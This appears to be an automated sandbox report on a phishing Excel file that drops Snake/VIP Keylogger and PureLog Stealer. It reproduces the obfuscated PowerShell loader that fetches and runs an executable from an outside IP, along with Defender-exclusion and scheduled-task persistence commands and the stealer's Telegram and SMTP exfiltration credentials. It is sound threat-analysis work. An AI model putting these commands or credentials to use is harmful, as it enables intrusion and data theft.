Edit tour
Windows
Analysis Report
SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx
Overview
General Information
| Sample name: | SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx |
| Analysis ID: | 1492413 |
| MD5: | d35618eec168e30e2a2df672f612388c |
| SHA1: | 7637c3d56066f932e38de4918c5a3756791491e2 |
| SHA256: | bd980fb1f921bf16d88b62d519ed6adb057ffc3c93532fca6465fac9e7074123 |
| Tags: | xlsx |
| Infos: |   |
 | |
Detection
PureLog Stealer, Snake Keylogger, VIP Keylogger
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected PureLog Stealer
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious Excel or Word document
Adds a directory exclusion to Windows Defender
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: System File Execution Location Anomaly
Sigma detected: Windows Binaries Write Suspicious Extensions
Suspicious command line found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Yara detected MalDoc
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 1208 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
mshta.exe (PID: 2480 cmdline: C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) 
cmd.exe (PID: 2040 cmdline: "C:\Window s\system32 \cmd.exe" "/C POWERS hELL.eXE -Ex bYPasS -nOP -W 1 -c De vIcECRedEN TIaLdePlOY mENT.EXE ; ieX($(IEX ('[SyStEm. TEXT.eNcOD inG]'+[cha r]58+[cHaR ]0x3a+'UTf 8.gEtsTriN G([sYSTeM. COnVErT]'+ [cHar]58+[ CHAr]0X3A+ 'FrOMbaSE6 4stRING('+ [chAr]0x22 +'JFQyNWd0 Zm90RXVTIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC A9ICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBBREQt VFlwZSAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 1FbWJlckRl RmlOSXRJb2 4gICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICdbRGxs SW1wb3J0KC J1cmxNb04i LCAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgQ2hhcl NldCA9IENo YXJTZXQuVW 5pY29kZSld cHVibGljIH N0YXRpYyBl eHRlcm4gSW 50UHRyIFVS TERvd25sb2 FkVG9GaWxl KEludFB0ci AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC Agc0NsdUJF TW8sc3RyaW 5nICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICBqLHN0 cmluZyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgQ0 lVLHVpbnQg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg IGNuLEludF B0ciAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgSUdq RCk7JyAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgLU 5hTUUgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICJZ VnZGVnlSdE 4iICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAtbmFt ZVNwQUNFIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAgIC Bsa3lrV0Rl eGggICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgIC1QYX NzVGhydTsg ICAgICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICRUMjVndG ZvdEV1Uzo6 VVJMRG93bm xvYWRUb0Zp bGUoMCwiaH R0cDovLzE5 Mi4zLjE3Ni 4xMzgvNDAv c2lob3N0Lm V4ZSIsIiRF blY6QVBQRE FUQVxzaWhv c3QuZXhlIi wwLDApO1N0 YVJULVNMZU VwKDMpO1N0 YVJ0ICAgIC AgICAgICAg ICAgICAgIC AgICAgICAg ICAgICAiJG VOVjpBUFBE QVRBXHNpaG 9zdC5leGUi '+[chAr]34 +'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) 
powershell.exe (PID: 3096 cmdline: POWERShELL .eXE -Ex bYPasS -nOP -W 1 -c DevIc ECRedENTIa LdePlOYmEN T.EXE ; ie X($(IEX('[ SyStEm.TEX T.eNcODinG ]'+[char]5 8+[cHaR]0x 3a+'UTf8.g EtsTriNG([ sYSTeM.COn VErT]'+[cH ar]58+[CHA r]0X3A+'Fr OMbaSE64st RING('+[ch Ar]0x22+'J FQyNWd0Zm9 0RXVTICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICA9I CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBBREQtVFl wZSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU1Fb WJlckRlRml OSXRJb24gI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CdbRGxsSW1 wb3J0KCJ1c mxNb04iLCA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gQ2hhclNld CA9IENoYXJ TZXQuVW5pY 29kZSldcHV ibGljIHN0Y XRpYyBleHR lcm4gSW50U HRyIFVSTER vd25sb2FkV G9GaWxlKEl udFB0ciAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgc 0NsdUJFTW8 sc3RyaW5nI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBqLHN0cml uZyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgQ0lVL HVpbnQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIGN uLEludFB0c iAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgSUdqRCk 7JyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgLU5hT UUgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICJZVnZ GVnlSdE4iI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtbmFtZVN wQUNFICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBsa 3lrV0RleGg gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIC1QYXNzV GhydTsgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICR UMjVndGZvd EV1Uzo6VVJ MRG93bmxvY WRUb0ZpbGU oMCwiaHR0c DovLzE5Mi4 zLjE3Ni4xM zgvNDAvc2l ob3N0LmV4Z SIsIiRFblY 6QVBQREFUQ VxzaWhvc3Q uZXhlIiwwL DApO1N0YVJ ULVNMZUVwK DMpO1N0YVJ 0ICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAiJGVOV jpBUFBEQVR BXHNpaG9zd C5leGUi'+[ chAr]34+') )')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) 
csc.exe (PID: 3312 cmdline: "C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\d1xzy0 xm\d1xzy0x m.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3328 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES4D56.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\d1x zy0xm\CSCC F15997BD6B 546CEB43AF 983F4CD5CA 2.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) 
sihost.exe (PID: 3408 cmdline: "C:\Users\ user\AppDa ta\Roaming \sihost.ex e" MD5: D02CC222E09FD373FAF4030AC735618C) - powershell.exe (PID: 3472 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\bKVNuVu E.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8) - schtasks.exe (PID: 3488 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /TN "Up dates\bKVN uVuE" /XML "C:\Users \user\AppD ata\Local\ Temp\tmp8A F2.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - sihost.exe (PID: 3620 cmdline:
"C:\Users\ user\AppDa ta\Roaming \sihost.ex e" MD5: D02CC222E09FD373FAF4030AC735618C) 
AcroRd32.exe (PID: 3176 cmdline: "C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroR d32.exe" - Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817) 
RdrCEF.exe (PID: 3940 cmdline: "C:\Progra m Files (x 86)\Adobe\ Acrobat Re ader DC\Re ader\AcroC EF\RdrCEF. exe" --bac kgroundcol or=1651404 3 MD5: 326A645391A97C760B60C558A35BB068)
- taskeng.exe (PID: 3636 cmdline:
taskeng.ex e {6C21069 8-E638-4D5 1-B8D8-9F2 9DBC70A32} S-1-5-21- 966771315- 3019405637 -367336477 -1006:user -PC\user:I nteractive :[1] MD5: 65EA57712340C09B1B0C427B4848AE05) - bKVNuVuE.exe (PID: 3712 cmdline:
C:\Users\u ser\AppDat a\Roaming\ bKVNuVuE.e xe MD5: D02CC222E09FD373FAF4030AC735618C) - powershell.exe (PID: 3780 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Add-MpPref erence -Ex clusionPat h "C:\User s\user\App Data\Roami ng\bKVNuVu E.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8) - schtasks.exe (PID: 3816 cmdline:
"C:\Window s\System32 \schtasks. exe" /Crea te /TN "Up dates\bKVN uVuE" /XML "C:\Users \user\AppD ata\Local\ Temp\tmpA3 FD.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3) - bKVNuVuE.exe (PID: 3948 cmdline:
"C:\Users\ user\AppDa ta\Roaming \bKVNuVuE. exe" MD5: D02CC222E09FD373FAF4030AC735618C) - bKVNuVuE.exe (PID: 3532 cmdline:
"C:\Users\ user\AppDa ta\Roaming \bKVNuVuE. exe" MD5: D02CC222E09FD373FAF4030AC735618C) - bKVNuVuE.exe (PID: 3556 cmdline:
"C:\Users\ user\AppDa ta\Roaming \bKVNuVuE. exe" MD5: D02CC222E09FD373FAF4030AC735618C) - bKVNuVuE.exe (PID: 3504 cmdline:
"C:\Users\ user\AppDa ta\Roaming \bKVNuVuE. exe" MD5: D02CC222E09FD373FAF4030AC735618C) - bKVNuVuE.exe (PID: 3560 cmdline:
"C:\Users\ user\AppDa ta\Roaming \bKVNuVuE. exe" MD5: D02CC222E09FD373FAF4030AC735618C)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| 404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution |
{"C2 url": "https://api.telegram.org/bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendMessage"}{"Exfil Mode": "SMTP", "Bot Token": "7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU", "Chat id": "403948698", "Email ID": "yUiavQX8", "Password": "us2.smtp.mailhostbox.com", "Host": "favourcloning@gmail.com", "Port": "587", "Version": "4.4"}{"Exfil Mode": "SMTP", "Username": "jyotis@sixilncoln.com", "Password": "yUiavQX8", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_MalDoc_4 | Yara detected MalDoc | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | ||
| JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | ||
| Click to see the 19 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 25 entries | ||||
System Summary |   |
|---|
| Source: | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Florian Roth (Nextron Systems): | ||
| Source: | Author: Michael Haag: | ||